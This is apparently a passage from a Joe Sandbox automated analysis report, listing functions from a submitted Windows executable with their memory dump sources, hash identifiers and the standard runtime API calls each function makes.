                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                    • Opcode ID: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
                                                                                                                                    • Instruction ID: b24af11cee9d846d08aeeae125d6f8bcb34ebc56a5e067c578b1de17f0012201
                                                                                                                                    • Opcode Fuzzy Hash: 6a308b0ac098624afcdfd044da487debd3fb0f3bace67edc213ce3488a8362c3
                                                                                                                                    • Instruction Fuzzy Hash: 31311AB5D05219DFDB21EFA4D9897CDBBB8BF04304F1040AAE50CAB250EB759B848F45
                                                                                                                                    APIs
                                                                                                                                    • VirtualQuery.KERNEL32(80000000,0037E5E8,0000001C,0037E7DD,00000000,?,?,?,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6B4
                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0037E5E8,00000004,003C1CEC,0037E86D), ref: 0037E6CF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                                    • String ID: D
                                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                                    • Opcode ID: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
                                                                                                                                    • Instruction ID: 2b8fb05748abead62fe0d416e77b48996d2d1be235aecf1756d1a7c6145b4b72
                                                                                                                                    • Opcode Fuzzy Hash: 6ed878d60b388919a502a8f4ac07d877adadd373acafe6b7175f82531e6fbafb
                                                                                                                                    • Instruction Fuzzy Hash: DA01F77260010D6BDB24DE29DC09BDD7BAAAFC8329F0DC161ED1DD7154D638D9058680
                                                                                                                                    APIs
                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00388FB5
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00388FBF
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00388FCC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                    • Opcode ID: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
                                                                                                                                    • Instruction ID: 040a6fe47325f5c364534f76c2c2bc3ebffdbd0dfc27cc14ec06d586a77e5c40
                                                                                                                                    • Opcode Fuzzy Hash: 66d6714bdccf70de9963b125615f882985497ed93a6fcd5142ba76a285921a40
                                                                                                                                    • Instruction Fuzzy Hash: CF31C8759013189BCB22DF64DC8979DBBB8BF08310F5041EAE41CA7250EB759F858F44
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                    • Instruction ID: 6cfbd4251c47ee5fbd4f20dcd2e9f0ca8d9a5e4de5d63df66b5748d927bf6c80
                                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                    • Instruction Fuzzy Hash: 99021C71E002199FDF15DFA9D8806ADB7F1EF48314F2581AAE919EB384D731AD418B90
                                                                                                                                    APIs
                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
                                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2169056816-0
                                                                                                                                    • Opcode ID: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
                                                                                                                                    • Instruction ID: 78598a27b9ceafb58ce985fa673382e465eb1b2023a26af5459a2cce98db0376
                                                                                                                                    • Opcode Fuzzy Hash: 93c7a477ad51ec3486f4c689353bc1f8cc2b71528e55440a55025c340598d432
                                                                                                                                    • Instruction Fuzzy Hash: DA01717A140308AEDB12DFA4EC45F9A77BCEF08714F009022FB0597161D3709955CBA5
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(00366DDF,00000000,00000400), ref: 00366C74
                                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00366C95
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                    • Opcode ID: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
                                                                                                                                    • Instruction ID: 03283c36bf37d9575419021758afd39c49ad9d3911834df43911fdf883e8c573
                                                                                                                                    • Opcode Fuzzy Hash: 1ac342a1041ee9e54f965cf7aa5042beea3c3f2cbdbaa9ae51da631a984920ab
                                                                                                                                    • Instruction Fuzzy Hash: BBD0C971344300BFFA120B628D07F6A7B9DBF45B91F18C405B796E80E0CAB59824E629
                                                                                                                                    APIs
                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003919EF,?,?,00000008,?,?,0039168F,00000000), ref: 00391C21
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                    • Opcode ID: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
                                                                                                                                    • Instruction ID: 325c1d1a1ea818dc26eda27474ba45dfbc873fb374cb532af60ccecc94643b4d
                                                                                                                                    • Opcode Fuzzy Hash: 3283fdd830d173904365d9335fb382139cff537d0f2b35a4bf45603fca56eff1
                                                                                                                                    • Instruction Fuzzy Hash: D8B15C3521060A9FDB16CF28C48AB657BE1FF45364F268698E89ADF2A1C335DD91CB40
                                                                                                                                    APIs
                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0037F66A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                    • Opcode ID: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
                                                                                                                                    • Instruction ID: fd9dc0d7806cd7906a3a9fa1bfffe9e09883ed2ac0b642939ae185f2c9d1cb65
                                                                                                                                    • Opcode Fuzzy Hash: 8c62e40cc93066ae0c2d07b025f3d179857e19ad523e9703f4b969a1eeaf874e
                                                                                                                                    • Instruction Fuzzy Hash: 565181B1900605CFEB2ACF94D8857AAB7F8FB48354F25853AD409EB251D379ED00CB51
                                                                                                                                    APIs
                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Version
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                    • Opcode ID: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
                                                                                                                                    • Instruction ID: d0c2502b561adab96f36d38a5d89da72d4ca0b7aa0635bf75f4bc2e0e0a09324
                                                                                                                                    • Opcode Fuzzy Hash: 77159750ef7042ea409a16a5fe08df56fb97761f7a5cfd1c7c4ba7cb1b35c5b1
                                                                                                                                    • Instruction Fuzzy Hash: FFF03AB4E00218DFDB1ACB18EC926DA73F9FB8A315F114296D91693390C3B0A9C48E60
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: gj
                                                                                                                                    • API String ID: 0-4203073231
                                                                                                                                    • Opcode ID: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
                                                                                                                                    • Instruction ID: b1ae66b1c1048837e7a341d1219d59ea3c84150f310991fbf1baa53e54282874
                                                                                                                                    • Opcode Fuzzy Hash: 1c0119179a0c39568eedd5dcd26acf785502266cc17353ed66d5867a59e64076
                                                                                                                                    • Instruction Fuzzy Hash: 89C137B6A183418FC354CF29D89065AFBE1BFC8308F19892DE998D7311D734E949CB96
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0037F3A5), ref: 0037F9DA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
                                                                                                                                    • Instruction ID: 1792c0a2e0302bc17e3b88a26aec8b67dd7a7b01ccd496880558769e347e56ba
                                                                                                                                    • Opcode Fuzzy Hash: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                    • Opcode ID: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
                                                                                                                                    • Instruction ID: 9ab79297a62fbc30280236ab9e85274a915ab427ccad4bba9e23498551e69d84
                                                                                                                                    • Opcode Fuzzy Hash: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
                                                                                                                                    • Instruction Fuzzy Hash: 99A011B02022008B83028F30AE08A0A3AACAA00380B08002BA00AC0030EAA088A0AB00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                    • Instruction ID: b3995e20b677407f7601c1f8f831700854c91e2e52fe41cec7e34f26fa9fb912
                                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                    • Instruction Fuzzy Hash: 9C62F771604B859FCB26CF28C4A16B9BBE1AF95304F09C96DD8DE8B742D738E944CB11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                    • Instruction ID: 58d506998e48573843da9c43beaacaf8d3f69681002bb5435035d4b54b52a8d2
                                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                    • Instruction Fuzzy Hash: C962F7716083459FCB26CF28C8806B9BBE1BF99304F09C96DE89E8B746D734E945CB11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                    • Instruction ID: 946b010ea1aed0ff135ccf605b8cc071c2d6367cd05fe7313f55c6aaae8e6347
                                                                                                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                    • Instruction Fuzzy Hash: 29524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
